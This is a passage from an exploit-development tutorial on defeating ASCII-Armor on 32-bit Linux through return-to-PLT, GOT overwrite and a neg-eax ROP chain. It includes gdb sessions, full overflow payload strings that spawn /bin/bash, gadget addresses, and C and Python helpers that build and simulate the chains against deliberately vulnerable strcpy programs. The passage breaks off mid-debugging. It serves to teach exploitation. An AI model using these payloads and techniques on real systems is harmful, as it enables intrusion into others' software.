jumping in the middle of a multi-byte opcode, we are literally interpreting it to be a different
instruction. If this new instruction is smaller than the rest of the original one, then
instructions after it will be affected and interpreted differently also. Let's try an offset of -2:
(gdb) x/3i exit-2
0x22abfe: jbe 0x22ac00 <exit>
0x22ac00 <exit>: push %ebp
0x22ac01 <exit+1>: mov %esp,%ebp
(gdb)
At -2, the exit() function is interpreted correctly, but the two bytes before it are interpreted to
be a conditional jump instruction. This introduces a real possibility of the flow of execution
being thrown off, so let's disregard this option and check offset -3:
(gdb) x/3i exit-3
0x22abfd: lea 0x0(%esi),%esi
0x22ac00 <exit>: push %ebp
0x22ac01 <exit+1>: mov %esp,%ebp
(gdb)
An offset of -3 looks like a good option. The three bytes before exit() are interpreted to be a
harmless lea (load effective address) instruction which won't affect the interpretation or proper
functionality of exit(). So, if for some reason 0x0022ac01 was not a viable option (say, input
filtering), we could substitute it with 0x0022abfd with no consequence.
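A quick way to vet a candidate address is to count its null bytes before putting it in the
payload. A sketch, with null_byte_count() being our own hypothetical helper:

```c
#include <stdint.h>

/* Count how many of the four bytes of a 32-bit address are 0x00. */
int null_byte_count(uint32_t addr)
{
    int count = 0;
    int i;

    for (i = 0; i < 4; i++) {
        if (((addr >> (8 * i)) & 0xff) == 0)
            count++;
    }
    return count;
}
```

exit() itself (0x0022ac00) scores 2, while exit+1 (0x0022ac01) and exit-3 (0x0022abfd) both score
1: only the ASCII-Armor byte is left.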
We still have to deal with the problem of ASCII-Armor, however, so let's move on to talk about a
technique called return-to-PLT.
V. Return-to-PLT
================
The PLT, formally known as the Procedure Linkage Table, is a feature of ELF binaries that assists
with the dynamic linking process. In order to understand how to abuse this feature, we need to
first know a bit about what's happening behind the scenes.
By nature, ELF shared libraries are compiled as position-independent code (PIC), which means that
they function and execute properly regardless of location in memory. This is fundamentally
important to dynamic linking, because if all shared libraries were compiled with a static load
address, a situation would inevitably arise where two libraries shared the same load address or
overlapped each other in memory. Because shared libraries are compiled as PIC, the dynamic linker is
free to decide at runtime which libraries to load and where in memory to map them.
In order for the running program to find symbols within these libraries, it references a data
structure called the Global Offset Table (GOT), a table of pointers to symbols within shared
libraries. For Windows exploit developers, the GOT is essentially the same as the Import Address
Table (IAT).
When a function is called for the first time, a small piece of code is executed by the
PLT to resolve the function's actual address. The GOT is patched with this address so that future
calls to the library function's PLT stub directly reference the resolved address, resulting in
greater efficiency. This is called lazy binding.
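Lazy binding is easy to mimic with a plain function pointer. The toy below is not how the dynamic
linker is actually implemented, just a sketch of the idea: a hypothetical got_slot starts out
pointing at a resolver stub, and the first call patches the slot with the "real" function.

```c
/* Toy model of lazy binding. All names are invented for illustration. */

typedef int (*func_ptr)(int);

int resolve_count = 0;              /* how many times the resolver ran */

int real_function(int x)            /* stands in for the libc function */
{
    return x * 2;
}

int resolver_stub(int x);           /* forward declaration */

func_ptr got_slot = resolver_stub;  /* "GOT entry", unresolved at first */

/* First call lands here: look up the real address, patch the slot,
 * then hand control to the real function. */
int resolver_stub(int x)
{
    resolve_count++;
    got_slot = real_function;
    return real_function(x);
}

/* "PLT stub": always jumps through whatever the GOT slot holds. */
int plt_call(int x)
{
    return got_slot(x);
}
```

The resolver runs only on the first plt_call(); every later call goes straight through the patched
slot. Note that whoever can write to got_slot decides where every later call ends up.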
In the realm of exploitation, if the libc function you wish to call is legitimately used by the
program, then it's as simple as calling the function's PLT stub. For instance, if system() is used
elsewhere in the program, then an entry for it will exist in the PLT. Jumping directly to this
address will execute the PLT stub, resolving the real address of the function in libc (or using the
stored one in the GOT) and calling it. By adding a call to system() elsewhere in our test program,
we can observe this situation and take advantage of it.
[storm@Dysthymia audit]$ cat example.c
#include <string.h>
#include <stdlib.h>
void foo (char *bar)
{
    char c[12];
    strcpy(c, bar); // no bounds checking...
    system("/bin/echo woot");
}
int main (int argc, char **argv)
{
    foo(argv[1]);
}
[storm@Dysthymia audit]$ gcc example.c -o example
[storm@Dysthymia audit]$ gdb -q ./example
Reading symbols from /home/storm/Desktop/audit/example...(no debugging symbols found)...done.
(gdb) info functions
All defined functions:
Non-debugging symbols:
0x080482b4 _init
0x080482f4 __gmon_start__
0x080482f4 __gmon_start__@plt
0x08048304 system
0x08048304 system@plt
0x08048314 __libc_start_main
0x08048314 __libc_start_main@plt
0x08048324 strcpy
0x08048324 strcpy@plt
0x08048340 _start
0x08048370 __do_global_dtors_aux
0x080483d0 frame_dummy
0x080483f4 foo
0x0804841a main
0x08048440 __libc_csu_init
0x080484a0 __libc_csu_fini
0x080484a5 __i686.get_pc_thunk.bx
0x080484b0 __do_global_ctors_aux
0x080484dc _fini
(gdb) break main
Breakpoint 1 at 0x804841d
(gdb) run
Starting program: /home/storm/Desktop/audit/example
Breakpoint 1, 0x0804841d in main ()
(gdb) find $esp, 0xbfffffff, "/bin/bash"
0xbffff310
1 pattern found.
(gdb) run `perl -e'print "A"x24 . "\x04\x83\x04\x08" . "XXXX" . "\x10\xf3\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/storm/Desktop/audit/example `perl -e'print "A"x24 . "\x04\x83\x04\x08" .
"XXXX" . "\x10\xf3\xff\xbf"'`
Breakpoint 1, 0x0804841d in main ()
(gdb) c
Continuing.
Detaching after fork from child process 8096.
woot
Detaching after fork from child process 8097.
[storm@Dysthymia audit]$ echo We\'ve got shell.
We've got shell.
[storm@Dysthymia audit]$
VI. Return-to-PLT + GOT Overwrite
=================================
Of course, system() is not always going to be available, and sometimes the functions that are
available to us just don't cut it. At this point, we can take it another step further and take
advantage of a different feature of dynamic linking by overwriting entries in the GOT itself.
Let's modify our test program a little more before continuing on, removing the call to system() and
adding a call to printf():
[storm@Dysthymia audit]$ cat example.c
#include <string.h>
#include <stdio.h>
void foo (char *bar)
{
    char c[12];
    strcpy(c, bar); // no bounds checking...
}
int main (int argc, char **argv)
{
    foo(argv[1]);
    printf("Your input: %s\n", argv[1]);
}
[storm@Dysthymia audit]$
Let's take a closer look at the PLT stub for printf():
[storm@Dysthymia audit]$ gcc example.c -o example
[storm@Dysthymia audit]$ gdb -q ./example
Reading symbols from /home/storm/Desktop/audit/example...(no debugging symbols found)...done.
(gdb) info functions
All defined functions:
Non-debugging symbols:
0x080482b4 _init
0x080482f4 __gmon_start__
0x080482f4 __gmon_start__@plt
0x08048304 __libc_start_main
0x08048304 __libc_start_main@plt
0x08048314 strcpy
0x08048314 strcpy@plt
0x08048324 printf
0x08048324 printf@plt
0x08048340 _start
0x08048370 __do_global_dtors_aux
0x080483d0 frame_dummy
0x080483f4 foo
0x0804840e main
0x08048450 __libc_csu_init
0x080484b0 __libc_csu_fini
0x080484b5 __i686.get_pc_thunk.bx
0x080484c0 __do_global_ctors_aux
0x080484ec _fini
(gdb) x/3i 0x08048324
0x8048324 <printf@plt>: jmp *0x80496bc
0x804832a <printf@plt+6>: push $0x18
0x804832f <printf@plt+11>: jmp 0x80482e4
(gdb)
This first instruction is interesting. It's dereferencing a pointer to somewhere in the GOT and
then jumping to that value. Let's look back to our program that reads /proc/self/maps:
[storm@Dysthymia audit]$ ./stacky | grep 08049
08048000-08049000 r-xp 00000000 fd:03 263455 /home/storm/Desktop/audit/stacky
08049000-0804a000 rw-p 00000000 fd:03 263455 /home/storm/Desktop/audit/stacky
[storm@Dysthymia audit]$
It looks like the GOT is writable! By chaining together calls to libc, we can write four arbitrary
bytes to 0x80496bc, effectively relocating printf() to an address of our choosing. The next time
printf() is called, our target code will be run instead. As usual, our goal here will be system().
There is really no reason for a pointer to system() to be present anywhere in memory, so we're going
to have to construct it byte-by-byte. Note that while we're using strcpy() for our exploit, any
function that moves bytes may be used, such as memcpy(), strcat(), or sprintf(). Let's build a new
template:
AAAAAAAAAAAAAAAAAAAAAAAA [ strcpy@plt ] [ pop pop ret ] [ GOT_of_printf[0] ] [ system[0] ]
                         [ strcpy@plt ] [ pop pop ret ] [ GOT_of_printf[1] ] [ system[1] ]
                         [ strcpy@plt ] [ pop pop ret ] [ GOT_of_printf[2] ] [ system[2] ]
                         [ strcpy@plt ] [ pop pop ret ] [ GOT_of_printf[3] ] [ system[3] ]
                         [ printf@plt ] [ any 4 bytes ] [ address of "/bin/bash" ]
Conceptually, the process will first return into strcpy(), moving the first byte of &system into the
first byte of the GOT entry for printf() (as well as anything after it up until 0x00 since we're
using strcpy(), but this doesn't really matter). Upon returning from strcpy(), it will then jump
into a pop pop ret gadget, which pops the two arguments of the first strcpy() off the stack and
returns into the second strcpy(), granting us the ability to chain libc calls with two arguments.
Wait, did we say gadget? It's almost like we're writing a ROP exploit or something....
A gadget is essentially a small sequence of instructions that exists in the process's address space
that does something useful for our exploit. By returning into a gadget, we can leverage existing
code to manipulate memory and registers in a predictable way. While gadgets come in many different
forms and can perform many different operations, one thing that always remains constant is that they
are terminated by a ret instruction. In a "true" ROP exploit, our libc chain is replaced instead by
a chain of pointers to gadgets, executing one after another to set the process memory in a specific
state to perform a specific task.
For instance, on Windows 32-bit systems, one of the most common methods of ROP exploitation is to
allocate a new executable heap by returning into VirtualAlloc() or marking an existing heap
executable using VirtualProtect(). Gadgets are then used to copy second-stage shellcode onto the
newly-created heap, ultimately jumping into the heap and executing the shellcode.
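Getting back to our strcpy() chain, the template is regular enough to generate in a loop. This is
a sketch only: build_got_chain() is a hypothetical helper, and every address passed to it is a
placeholder that the exploit writer has to supply.

```c
#include <stddef.h>
#include <stdint.h>

#define CHAIN_WORDS 19  /* 4 links of 4 words, plus 3 for the final call */

/* Fill out[] with the 32-bit words that follow the overflow padding:
 *   4 x { strcpy@plt, pop-pop-ret, GOT entry + i, address of byte i }
 *   then { overwritten function's PLT stub, junk return, argument }.
 * byte_src[i] is an address in memory holding byte i of the target
 * pointer, least significant byte first. */
size_t build_got_chain(uint32_t out[CHAIN_WORDS],
                       uint32_t strcpy_plt, uint32_t pop_pop_ret,
                       uint32_t got_entry, const uint32_t byte_src[4],
                       uint32_t victim_plt, uint32_t arg)
{
    size_t n = 0;
    uint32_t i;

    for (i = 0; i < 4; i++) {
        out[n++] = strcpy_plt;     /* return into strcpy()              */
        out[n++] = pop_pop_ret;    /* strcpy() returns here, skips args */
        out[n++] = got_entry + i;  /* dest: byte i of the GOT entry     */
        out[n++] = byte_src[i];    /* src: where byte i can be found    */
    }
    out[n++] = victim_plt;         /* now jumps through the patched GOT */
    out[n++] = 0x41414141u;        /* return address, never used        */
    out[n++] = arg;                /* first argument                    */
    return n;
}
```

Each word still has to be written out little endian after the padding, and none of them may
contain a null byte if the copy is done by strcpy().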
In order to find our pop pop ret gadget, we'll use msfelfscan, part of the Metasploit framework. If
developing an exploit on Win32, the mona.py plugin for Immunity Debugger by Corelan Team is one of
the best options for not only discovering potential gadget candidates, but automatically chaining
them into workable ROP chains.
[storm@Dysthymia audit]$ msfelfscan | grep \\-p
-p, --poppopret Search for pop+pop+ret combinations
[storm@Dysthymia audit]$ msfelfscan -p ./example
[./example]
0x080483c3 pop ebx; pop ebp; ret
0x080484a7 pop edi; pop ebp; ret
0x080484e8 pop ebx; pop ebp; ret
[storm@Dysthymia audit]$
Any of these gadgets should do fine.
Let's update our template with what we know so far: strcpy@plt, printf@plt, GOT_of_printf, and pop
pop ret. Let's just stick "AAAA" in the return address of the overwritten printf(), since it really
doesn't matter. While we're at it, let's just find the address of "/bin/bash" too:
(gdb) run
Starting program: /home/storm/Desktop/audit/example
Breakpoint 1, 0x08048411 in main ()
(gdb) find $esp, 0xbfffffff, "/bin/bash"
0xbffff310
1 pattern found.
(gdb)
So, that brings us to:
AAAAAAAAA... [ \x14\x83\x04\x08 ] [ \xc3\x83\x04\x08 ] [ \xbc\x96\x04\x08 ] [ system[0] ]
             [ \x14\x83\x04\x08 ] [ \xc3\x83\x04\x08 ] [ \xbd\x96\x04\x08 ] [ system[1] ]
             [ \x14\x83\x04\x08 ] [ \xc3\x83\x04\x08 ] [ \xbe\x96\x04\x08 ] [ system[2] ]
             [ \x14\x83\x04\x08 ] [ \xc3\x83\x04\x08 ] [ \xbf\x96\x04\x08 ] [ system[3] ]
             [ \x24\x83\x04\x08 ] [ \x41\x41\x41\x41 ] [ \x10\xf3\xff\xbf ]
All we have left to do is find the locations of four bytes in memory that will be assembled together
to form &system.
(gdb) p system
$1 = {<text variable, no debug info>} 0x235eb0 <__libc_system>
(gdb)
These four bytes are: 0x00, 0x23, 0x5e, and 0xb0. It will be pretty easy to find these bytes
somewhere in memory, but for the greatest reliability we should confine the search to just within
the loaded program itself. We can't directly address the shared libraries (thanks to ASCII-Armor,
their addresses contain null bytes), and the stack and heap are too dynamic for reliable use.
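The search itself is nothing fancy. As a sketch of what we're after, here is a linear scan over a
buffer standing in for the mapped binary image; find_byte() is a hypothetical helper and base is
whatever address the region is mapped at.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Scan len bytes of image (mapped at address base) for the first
 * occurrence of needle. Returns its address, or 0 if not found. */
uint32_t find_byte(const unsigned char *image, size_t len,
                   uint32_t base, unsigned char needle)
{
    const unsigned char *hit =
        (const unsigned char *)memchr(image, needle, len);

    if (hit == NULL)
        return 0;
    return base + (uint32_t)(hit - image);
}
```

Running it once per byte of &system gives the four source addresses needed to finish the chain.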
By looking back at the output of ./stacky in the beginning of this paper, we notice that the memory
region 0x08048000-0x0804a000 remains static throughout every invocation of the program, both with
and without ASLR enabled. By looking at the ELF header of ./example, we see that within this region
of memory resides the binary image itself:
[storm@Dysthymia audit]$ readelf -S ./example
There are 30 section headers, starting at offset 0x7ec:
Section Headers:
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
[ 0] NULL 00000000 000000 000000 00 0 0 0
[ 1] .interp PROGBITS 08048134 000134 000013 00 A 0 0 1 <---- start
[ 2] .note.ABI-tag NOTE 08048148 000148 000020 00 A 0 0 4
[ 3] .note.gnu.build-i NOTE 08048168 000168 000024 00 A 0 0 4
[ 4] .gnu.hash GNU_HASH 0804818c 00018c 000020 04 A 5 0 4
[ 5] .dynsym DYNSYM 080481ac 0001ac 000060 10 A 6 1 4
[ 6] .dynstr STRTAB 0804820c 00020c 000053 00 A 0 0 1
[ 7] .gnu.version VERSYM 08048260 000260 00000c 02 A 5 0 2
[ 8] .gnu.version_r VERNEED 0804826c 00026c 000020 00 A 6 1 4
[ 9] .rel.dyn REL 0804828c 00028c 000008 08 A 5 0 4
[10] .rel.plt REL 08048294 000294 000020 08 A 5 12 4
[11] .init PROGBITS 080482b4 0002b4 000030 00 AX 0 0 4
[12] .plt PROGBITS 080482e4 0002e4 000050 04 AX 0 0 4
[13] .text PROGBITS 08048340 000340 0001ac 00 AX 0 0 16
[14] .fini PROGBITS 080484ec 0004ec 00001c 00 AX 0 0 4
[15] .rodata PROGBITS 08048508 000508 00001c 00 A 0 0 4
[16] .eh_frame_hdr PROGBITS 08048524 000524 000024 00 A 0 0 4
[17] .eh_frame PROGBITS 08048548 000548 00007c 00 A 0 0 4
[18] .ctors PROGBITS 080495c4 0005c4 000008 00 WA 0 0 4
[19] .dtors PROGBITS 080495cc 0005cc 000008 00 WA 0 0 4
[20] .jcr PROGBITS 080495d4 0005d4 000004 00 WA 0 0 4
[21] .dynamic DYNAMIC 080495d8 0005d8 0000c8 08 WA 6 0 4
[22] .got PROGBITS 080496a0 0006a0 000004 04 WA 0 0 4
[23] .got.plt PROGBITS 080496a4 0006a4 00001c 04 WA 0 0 4
[24] .data PROGBITS 080496c0 0006c0 000004 00 WA 0 0 4
[25] .bss NOBITS 080496c4 0006c4 000008 00 WA 0 0 4 <---- end
[26] .comment PROGBITS 00000000 0006c4 00002c 01 MS 0 0 1
[27] .shstrtab STRTAB 00000000 0006f0 0000fc 00 0 0 1
[28] .symtab SYMTAB 00000000 000c9c 000430 10 29 45 4
[29] .strtab STRTAB 00000000 0010cc 000215 00 0 0 1
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings)
I (info), L (link order), G (group), x (unknown)
O (extra OS processing required) o (OS specific), p (processor specific)
[storm@Dysthymia audit]$
Using gdb, we can quickly search for hits within this range:
(gdb) find /b /1 0x08048134,0x080496c4,0x00
0x8048146
1 pattern found.
(gdb) find /b /1 0x08048134,0x080496c4,0x23
0x804883c
1 pattern found.
(gdb) find /b /1 0x08048134,0x080496c4,0x5e
0x8048342 <_start+2>
1 pattern found.
(gdb) find /b /1 0x08048134,0x080496c4,0xb0
0x8048294
1 pattern found.
(gdb)
Excellent. Let's update our template one last time:
AAAAAAAAA... [ \x14\x83\x04\x08 ] [ \xc3\x83\x04\x08 ] [ \xbc\x96\x04\x08 ] [ \x94\x82\x04\x08 ]
[ \x14\x83\x04\x08 ] [ \xc3\x83\x04\x08 ] [ \xbd\x96\x04\x08 ] [ \x42\x83\x04\x08 ]
[ \x14\x83\x04\x08 ] [ \xc3\x83\x04\x08 ] [ \xbe\x96\x04\x08 ] [ \x3c\x88\x04\x08 ]
[ \x14\x83\x04\x08 ] [ \xc3\x83\x04\x08 ] [ \xbf\x96\x04\x08 ] [ \x46\x81\x04\x08 ]
[ \x24\x83\x04\x08 ] [ \x41\x41\x41\x41 ] [ \x10\xf3\xff\xbf ]
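To see why the four copies are ordered from the lowest GOT byte to the highest, here's a rough
simulation of what the chained strcpy() calls do to the GOT slot at 0x080496bc. This is a sketch
under loud assumptions: memory is modelled as a Python dict, and only the FIRST byte at each source
address comes from the gdb output above. The trailing bytes are made up purely to show the spill.

```python
def strcpy(mem, dst, src):
    """Copy bytes from src to dst up to and including the first NUL, like C strcpy."""
    i = 0
    while True:
        b = mem[src + i]
        mem[dst + i] = b
        if b == 0:
            break
        i += 1

def place(mem, addr, data):
    """Load a byte string into the fake memory at addr."""
    for off, b in enumerate(data):
        mem[addr + off] = b

mem = {}
# First byte of each source is real (from `find`); the rest is HYPOTHETICAL filler.
place(mem, 0x08048294, b"\xb0\x11\x22\x00")
place(mem, 0x08048342, b"\x5e\x33\x00")
place(mem, 0x0804883c, b"\x23\x44\x55\x00")
place(mem, 0x08048146, b"\x00")

GOT_SLOT = 0x080496bc
sources = [0x08048294, 0x08048342, 0x0804883c, 0x08048146]
for i, src in enumerate(sources):
    strcpy(mem, GOT_SLOT + i, src)     # each copy starts one byte higher

patched = int.from_bytes(bytes(mem[GOT_SLOT + i] for i in range(4)), "little")
print(hex(patched))
```

Each copy may drag extra junk along with the byte we care about, but the next copy starts one byte
higher and overwrites that junk. The last source is a lone NUL, so it terminates the address
cleanly. In this model, anything spilled past the fourth byte stays clobbered.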
Tie it all together and let it rip:
(gdb) run `perl -e'print "A"x24 . "\x14\x83\x04\x08" . "\xc3\x83\x04\x08" . "\xbc\x96\x04\x08" .
"\x94\x82\x04\x08" . "\x14\x83\x04\x08" . "\xc3\x83\x04\x08" . "\xbd\x96\x04\x08" .
"\x42\x83\x04\x08" . "\x14\x83\x04\x08" . "\xc3\x83\x04\x08" . "\xbe\x96\x04\x08" .
"\x3c\x88\x04\x08" . "\x14\x83\x04\x08" . "\xc3\x83\x04\x08" . "\xbf\x96\x04\x08" .
"\x46\x81\x04\x08" . "\x24\x83\x04\x08" . "\x41\x41\x41\x41" . "\x10\xf3\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/storm/Desktop/audit/example `perl -e'print "A"x24 . "\x14\x83\x04\x08" .
"\xc3\x83\x04\x08" . "\xbc\x96\x04\x08" . "\x94\x82\x04\x08" . "\x14\x83\x04\x08" .
"\xc3\x83\x04\x08" . "\xbd\x96\x04\x08" . "\x42\x83\x04\x08" . "\x14\x83\x04\x08" .
"\xc3\x83\x04\x08" . "\xbe\x96\x04\x08" . "\x3c\x88\x04\x08" . "\x14\x83\x04\x08" .
"\xc3\x83\x04\x08" . "\xbf\x96\x04\x08" . "\x46\x81\x04\x08" . "\x24\x83\x04\x08" .
"\x41\x41\x41\x41" . "\x10\xf3\xff\xbf"'`
Detaching after fork from child process 14372.
[storm@Dysthymia audit]$ echo hax hax hax
hax hax hax
[storm@Dysthymia audit]$
VII. Return-to-libc by neg ROP
==============================
Readers should make sure they are familiar with all previous sections before continuing on. It's
worthwhile to know that there is, in fact, more than one way to circumvent ASCII-Armor. A second
technique discussed here is much shorter than the GOT overwrite method and relies more heavily on
ROP. For this method, we'll be borrowing a common tactic used by Windows exploit developers.
Instead of assembling an address byte-by-byte and patching the GOT, we can simply load the negated
address of system() into a register, negate the register, and then call the value of the register.
As our program is very small and doesn't contain a lot of code (and therefore very few gadgets to
work with), for the sake of the example we'll introduce a few small functions that provide the
appropriate neg and pop gadgets needed. Larger applications will have more code and more gadgets to
choose from, greatly increasing our chances of constructing a complete, featureful ROP chain.
[storm@Dysthymia audit]$ cat example.c
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
void foo (char *bar)
{
char c[12];
strcpy(c, bar); // no bounds checking...
}
int coff (int p)
{
int x = 50008; // this integer generates a 'pop eax; ret' sequence
int d = x-p;
printf("Difference from threshold: %i\n", d);
return d;
}
int tcomp (int p)
{
return -p; // will produce a 'neg eax' gadget
}
int main (int argc, char **argv)
{
foo(argv[1]);
printf("Your input: %s\n", argv[1]);
}
[storm@Dysthymia audit]$ gcc example.c -o example
[storm@Dysthymia audit]$
Let's build a new template for our exploit:
AAAAAAAAAAAAAAAAAAAAAAAA [ pop eax ] [ two's complement of &system ] [ neg eax ] [ call eax ]
^ [ "/bin/bash" ]
|
overflow ("A"x24)
In earlier ret2libc exploit demonstrations, we placed a 4-byte return-to pointer between the
pointer to system() and the function's argument. Since we are now executing an actual call
instruction instead of returning into system(), the return-to pointer is pushed onto the stack for
us, and the pointer immediately following in our exploit string is the function argument.
In order to build our ROP chain, we'll use ROPeMe to scan the binary and generate gadgets:
[storm@Dysthymia audit]$ ropeme-bhus10/ropeme/ropshell.py
Simple ROP interactive shell: [generate, load, search] gadgets
ROPeMe> generate ./example 4
Generating gadgets for ./example with backward depth=4
It may take few minutes depends on the depth and file size...
Processing code block 1/1
Generated 87 gadgets
Dumping asm gadgets to file: example.ggt ...
OK
ROPeMe> search pop %
Searching for ROP gadget: pop % with constraints: []
0x80482e0L: pop eax ; pop ebx ; leave ;;
0x8048417L: pop eax ;;
0x80484f3L: pop ebp ; ret ; mov ebx [esp] ;;
0x80483c4L: pop ebp ;;
0x804844bL: pop ebp ;;
0x80484e8L: pop ebp ;;
0x80482e1L: pop ebx ; leave ;;
0x8048545L: pop ebx ; leave ;;
0x80483c3L: pop ebx ; pop ebp ;;
0x8048528L: pop ebx ; pop ebp ;;
0x80484e5L: pop ebx ; pop esi ; pop edi ; pop ebp ;;
0x8048544L: pop ecx ; pop ebx ; leave ;;
0x80484e7L: pop edi ; pop ebp ;;
0x80484e6L: pop esi ; pop edi ; pop ebp ;;
ROPeMe> search neg %
Searching for ROP gadget: neg % with constraints: []
0x8048449L: neg eax ; pop ebp ;;
ROPeMe> search call %
Searching for ROP gadget: call % with constraints: []
0x80483f0L: call eax ; leave ;;
0x8048543L: call far dword [ecx+0x5b] ; leave ;;
ROPeMe>
For our 'pop eax' gadget, we'll choose 0x8048417 since it's the only straightforward option. Notice
that there is also a 'pop eax; pop ebx; leave ;;' gadget located at 0x80482e0, but we want to avoid
gadgets like these if at all possible to prevent having to work around the leave instruction messing
up the stack pointer (leave in x86 means literally 'mov esp, ebp; pop ebp').
AAAAAAAAAAAAAAAAAAAAAAAA [ \x17\x84\x04\x08 ] [ two's comp of &system ] [ neg eax ] [ call eax ]
^ [ "/bin/bash" ]
|
overflow ("A"x24)
For our 'neg eax' gadget, 0x8048449 is our only option but it will work fine. We'll have to work
around the 'pop ebp' instruction by modifying our template and adding a junk pointer into the ROP
chain immediately after the pointer to the gadget. When the gadget executes, it will first negate
eax (as we want) and then pop four junk bytes to ebp, performing nothing directly useful for us but
preventing the instruction from disrupting the rest of the chain.
AAAAAAAAAAAAAAAAAAAAAAAA [ \x17\x84\x04\x08 ] [ two's comp of &system ] [ \x49\x84\x04\x08 ]
^ [ \x41\x41\x41\x41 ] [ call eax ] [ "/bin/bash" ]
| ^
overflow ("A"x24) ------ junk 4 bytes
For our 'call eax' gadget, 0x80483f0 is our only candidate but it will also work fine. We don't
have to worry about the leave instruction in this gadget since we will have already called into
system() beforehand, so the only time it will be executed is after our dropped shell is closed. At
this point, the program will be heading towards a segfault anyway.
AAAAAAAAAAAAAAAAAAAAAAAA [ \x17\x84\x04\x08 ] [ two's comp of &system ] [ \x49\x84\x04\x08 ]
^ [ \x41\x41\x41\x41 ] [ \xf0\x83\x04\x08 ] [ "/bin/bash" ]
|
overflow ("A"x24)
We can calculate the two's complement (negation) of &system in gdb:
[storm@Dysthymia audit]$ gdb -q ./example
Reading symbols from /home/storm/Desktop/audit/example...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x8048450
(gdb) run
Starting program: /home/storm/Desktop/audit/example
Breakpoint 1, 0x08048450 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x235eb0 <__libc_system>
(gdb) p/x -0x235eb0
$2 = 0xffdca150
(gdb)
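The same arithmetic can be double-checked outside of gdb. Below is a small Python sketch (the
helper names neg32 and has_nul are ours, not from any tool) that negates a value modulo 2^32, packs
it little-endian, and checks it for NUL bytes, since a NUL would cut strcpy() short.

```python
import struct

MASK32 = 0xffffffff

def neg32(value):
    """Two's complement negation of a 32-bit value."""
    return (-value) & MASK32

def has_nul(value):
    """True if any byte of the packed 32-bit value is 0x00."""
    return b"\x00" in struct.pack("<I", value)

system_addr = 0x00235eb0
negated = neg32(system_addr)
packed = struct.pack("<I", negated)

print(hex(negated), packed)
print("raw address has NUL:", has_nul(system_addr))
print("negated address has NUL:", has_nul(negated))
```

Negating twice gets us back where we started, which is exactly what the 'neg eax' gadget does at
runtime.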
Update:
AAAAAAAAAAAAAAAAAAAAAAAA [ \x17\x84\x04\x08 ] [ \x50\xa1\xdc\xff ] [ \x49\x84\x04\x08 ]
^ [ \x41\x41\x41\x41 ] [ \xf0\x83\x04\x08 ] [ "/bin/bash" ]
|
overflow ("A"x24)
Finding the location of "/bin/bash" should be routine by now:
(gdb) find $esp, 0xbfffffff, "/bin/bash"
0xbffff310
1 pattern found.
(gdb)
And let's fill in the final part of the template:
AAAAAAAAAAAAAAAAAAAAAAAA [ \x17\x84\x04\x08 ] [ \x50\xa1\xdc\xff ] [ \x49\x84\x04\x08 ]
^ [ \x41\x41\x41\x41 ] [ \xf0\x83\x04\x08 ] [ \x10\xf3\xff\xbf ]
|
overflow ("A"x24)
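Before firing it off, the chain can be traced by hand. The sketch below is a toy model, not an
emulator: it hard-codes the three gadgets found by ROPeMe above as Python branches and walks the six
words of our template the way the CPU would, starting at foo()'s ret. The function name trace and
the dict it returns are our own invention for illustration.

```python
MASK32 = 0xffffffff

# The six dwords that follow the 24 bytes of padding in the template.
chain = [0x08048417, 0xffdca150, 0x08048449, 0x41414141, 0x080483f0, 0xbffff310]

def trace(words):
    """Walk the chain and report the state at the moment 'call eax' executes."""
    sp = 0                      # index of the word esp currently points at
    eax = ebp = 0

    def pop():
        nonlocal sp
        value = words[sp]
        sp += 1
        return value

    eip = pop()                 # foo()'s ret pops the first word into eip
    while True:
        if eip == 0x08048417:   # pop eax ; ret
            eax = pop()
            eip = pop()
        elif eip == 0x08048449: # neg eax ; pop ebp ; ret
            eax = (-eax) & MASK32
            ebp = pop()         # eats the junk dword
            eip = pop()
        elif eip == 0x080483f0: # call eax
            # call pushes its own return address, so the callee finds its
            # first argument in the next chain word (at [esp+4]).
            return {"target": eax, "arg": words[sp], "ebp": ebp}
        else:
            raise ValueError("no gadget modelled at %#x" % eip)

state = trace(chain)
print({name: hex(value) for name, value in state.items()})
```

If the junk dword is left out of the list, the model throws instead of reaching the call, which is
the paper equivalent of the segfault we would get on the real thing.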
And cross our fingers:
(gdb) disas foo
Dump of assembler code for function foo:
0x080483f4 <+0>: push %ebp
0x080483f5 <+1>: mov %esp,%ebp
0x080483f7 <+3>: sub $0x28,%esp
0x080483fa <+6>: mov 0x8(%ebp),%eax
0x080483fd <+9>: mov %eax,0x4(%esp)
0x08048401 <+13>: lea -0x14(%ebp),%eax
0x08048404 <+16>: mov %eax,(%esp)
0x08048407 <+19>: call 0x8048314 <strcpy@plt>
0x0804840c <+24>: leave
0x0804840d <+25>: ret
End of assembler dump.
(gdb) delete
Delete all breakpoints? (y or n) y
(gdb) break *0x0804840d
Breakpoint 2 at 0x804840d
(gdb) run `perl -e'print "A"x24 . "\x17\x84\x04\x08" . "\x50\xa1\xdc\xff" . "\x49\x84\x04\x08" .
"\x41\x41\x41\x41" . "\xf0\x83\x04\x08" . "\x10\xf3\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/storm/Desktop/audit/example `perl -e'print "A"x24 . "\x17\x84\x04\x08" .
"\x50\xa1\xdc\xff" . "\x49\x84\x04\x08" . "\x41\x41\x41\x41" . "\xf0\x83\x04\x08" .
"\x10\xf3\xff\xbf"'`
Breakpoint 2, 0x0804840d in foo ()
(gdb) x/32x $esp
0xbfffef3c: 0x08048417 0xffdca150 0x08048449 0x41414141
0xbfffef4c: 0x080483f0 0xbffff310 0x00000000 0xbfffefd8
0xbfffef5c: 0x00212e36 0x00000002 0xbffff004 0xbffff010
0xbfffef6c: 0xb7fff478 0x00110414 0xffffffff 0x001f8fbc
0xbfffef7c: 0x08048243 0x00000001 0xbfffefc0 0x001e8da7
0xbfffef8c: 0x001f9ab8 0xb7fff758 0x00381ff4 0x00000000
0xbfffef9c: 0x00000000 0xbfffefd8 0xa41d67a2 0x199850dd
0xbfffefac: 0x00000000 0x00000000 0x00000000 0x00000002
(gdb) x/i $eip
=> 0x804840d <foo+25>: ret
(gdb) si
Cannot access memory at address 0x41414145
(gdb) x/5i $eip
=> 0x8048417 <coff+9>: pop %eax
